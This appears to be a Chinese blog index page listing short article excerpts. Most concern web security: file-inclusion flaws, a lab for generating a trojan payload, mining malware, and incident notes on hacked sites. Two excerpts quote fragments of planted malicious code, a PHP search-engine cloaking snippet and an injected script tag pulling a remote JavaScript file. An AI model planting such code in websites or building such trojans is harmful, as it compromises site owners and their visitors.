前言: 本人(九世)正式从博客园:迁移到:http://hackhat.net。会进行同步更新 正文: 漏洞来源: 文件包含漏洞,得从文件包含说起。一般写代码的人都知道,完成一个项目里面有很多的文件调用和引用 而文件包含漏洞,因为文件包含的时候没有做对应的防御措施导致引用的文件变成攻击者所指定的文件 ...
分类:
其他好文 时间:
2018-06-30 19:48:47
阅读次数:
1001
iOS开源类iCarousel介绍 iCarousel是一个类,它继承于UIView,用于简化实现各种类型的旋转木马(分页滚动视图)iPhone、iPad和Mac OS。iCarousel实现一些常见的影响如圆柱、平面式的旋转木马。经过 iCarousel类的封装,使iCarousel类的使用方式类 ...
分类:
其他好文 时间:
2018-06-27 11:28:49
阅读次数:
228
什么是php的ssh2扩展 Php ssh2扩(以下简称PECL/ssh2),允许在php程序中远程执行系统命令和文件传输,不需要在被监控的机器上单独开发和部署类似agnet的"木马"程序,大大降低了运维成本。 Php ssh2扩展需要的依赖库: openssl: 加密算法集合,C语言实现 libs ...
分类:
其他好文 时间:
2018-06-15 22:34:52
阅读次数:
157
实验环境: 虚拟机:kali (攻击机) 192.168.1.2 虚拟机:windwos 2003 (靶机) 192.168.1.100 1. 制作木马 说明: -p payload(有效载荷) -e 编码方式 -i 编码次数 -b 在生成的程序中避免出现的值 -f exe 生成EXE的格式 输入命 ...
分类:
其他好文 时间:
2018-06-14 20:43:25
阅读次数:
2755
青岛峰会期间本来想给自己放几天假的,因为网站的挂马给泡汤了,打开网站首页,使用浏览器的源代码功能,发现自己网站的首页多了很多木马代码,于是我连接FTP查看网站首页的代码中发现了这个挂马代码,下面我把代码贴出来 : <?phperror_reporting(0);if(eregi('google|so ...
分类:
Web程序 时间:
2018-06-11 15:42:05
阅读次数:
170
网站域名被拦截 就是 被百度或腾讯安全中心或360浏览器的安全中心提示拦截风险了 (妥善解决办法 如果网站类型不是BC SQ站的话 可以检查下网站有无被入侵被挂马导致的风险提示拦截 如果网站被篡改导致的那么就要仔细检查下网站的程序漏洞以及后门木马的查杀了) 网站被流量劫持 就是 地区dns的劫持 如 ...
分类:
Web程序 时间:
2018-06-06 21:32:44
阅读次数:
240
挖矿木马简介 随着区块链的火爆,各种虚拟货币的行情一路走高,不乏有人像炒房炒股一样,通过包括大名鼎鼎的比特币在内的各种虚拟货币发家致富,让人眼馋。在这种情况下,黑客怎么会放过这么赚钱的机会呢。大家都知道,获取虚拟货币除了买卖还有就挖矿,挖矿其实是通过计算机做一些复杂的运算去算出还没有归属的虚拟货币节 ...
分类:
其他好文 时间:
2018-06-03 21:23:27
阅读次数:
226
写在前面 原生JS是原理,框架是迎合业务需求的重要关键工具 本文是整理工作及学习中理解的基础和难点,便于多方位理解功能模块整合和使用 不定期更新 行文仓促,文中有错误在所难免,欢迎诸位指正 transform实现图片旋转木马3D 功能代码摘自网络 JavaScript 方法 forEach() fo ...
分类:
Web程序 时间:
2018-06-02 23:56:28
阅读次数:
391
随着互联网的兴起,网络安全是未来互联网发展的一个重要方向。回顾2007年,那个互联网江湖非常混乱,黑客恶霸横行,木马肆虐的年代。 喜欢钻研网络技术和结识朋友的郭盛华,就在他16岁那年借助了时代的趋势,成立了庞大的东方联盟。在黑与被黑过程中,他的技术突飞猛进,他的网名“华少”渐在黑客江湖占据一席之地, ...
分类:
其他好文 时间:
2018-05-27 14:42:36
阅读次数:
166
title:lamp服务器站点目录被植入广告代码tags:植入代码广告,删除,替换grammar_cjkRuby:true[TOC]lamp服务器站点目录被植入广告代码1产生背景由于公司运维人员在系统上的权限体现分配不合理,导致站点目录被上传木马,把站点目录下所有文件均植入了如下广告<scriptlanguage=javascriptsrc=http://%4%66E/x.js?google
分类:
其他好文 时间:
2018-05-27 13:36:36
阅读次数:
157
